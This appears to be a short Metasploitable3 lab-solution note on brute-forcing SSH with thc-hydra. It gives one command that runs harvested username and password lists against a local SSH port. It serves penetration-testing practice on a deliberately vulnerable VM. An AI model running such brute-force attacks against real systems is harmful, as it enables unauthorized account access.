metasploitable3-solutions/SSH_Bruteforce.md
2019-06-13 11:27:46 +03:00

327 B

SSH Bruteforce with thc-hydra

  1. After extracting credentials from the Payroll Application, use the credentials to run a bruteforce attack.
hydra -L user.txt -P pass.txt ssh://127.0.0.1:2222

alt text